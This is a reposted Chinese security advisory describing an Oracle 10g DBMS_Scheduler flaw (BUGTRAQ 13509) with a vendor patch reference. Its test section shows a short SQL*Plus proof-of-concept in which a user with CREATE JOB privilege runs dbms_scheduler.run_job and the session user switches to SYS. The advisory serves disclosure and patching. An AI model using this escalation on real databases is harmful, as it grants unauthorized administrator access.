您当前的位置:网游热线游戏学院千年私服千年私服技术 → 文章内容 退出登录 用户管理
本类热门文章
相关下载
    Oracle 10g DBMS_Scheduler权限提升漏洞
    作者:佚名  来源:不详  发布时间:2006-5-2 14:00:33

    减小字体 增大字体

    受影响系统:
    Oracle database server 10g
    描述:
    --------------------------------------------------------------------------------
    BUGTRAQ ID: 13509

    Oracle是一款大型商用数据库软件。

    Oracle在用户访问权限的处理上存在漏洞,攻击者可能利用此漏洞提升权限。

    任何拥有CREATE JOB权限的用户都可以通过dbms_scheduler执行数据库任务,从SESSION_USER切换到SYS。这可能导致VPD(虚拟专用数据库)或OLS(Oracle标记安全)问题,并可能导致权限提升。

    <*来源:Alexander Kornbrust (ak@red-database-security.com

    链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111531740305049&w=2
    *>

    测试方法:
    --------------------------------------------------------------------------------

    警 告

    以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

    以拥有CREATE job权限的用户连接

    SQL> select user from dual;

    USER
    ---------
    JOBUSER

    SQL> execute dbms_scheduler.run_job('ANY_JOB');

    PL/SQL procedure successfully completed.

    SQL> select user from dual;

    USER
    ---------
    SYS

    SQL> select (sys_context('userenv','session_user')) from dual;

    USER
    ---------
    SYS

    SQL> select (sys_context('userenv','current_user')) from dual;

    USER
    ---------
    JOBUSER

    SQL> show user

    USER is "jobuser"

    建议:
    --------------------------------------------------------------------------------
    厂商补丁:

    Oracle
    ------
    目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载10.0.1.4补丁集:

    http://www.oracle.com

    [] [返回上一页] [打 印]
    文章评论 (评论内容只代表网友观点,与本站立场无关!)

    用户名: 查看更多评论

    分 值:100分 85分 70分 55分 40分 25分 10分 0分

    内 容:

             (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码

    关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图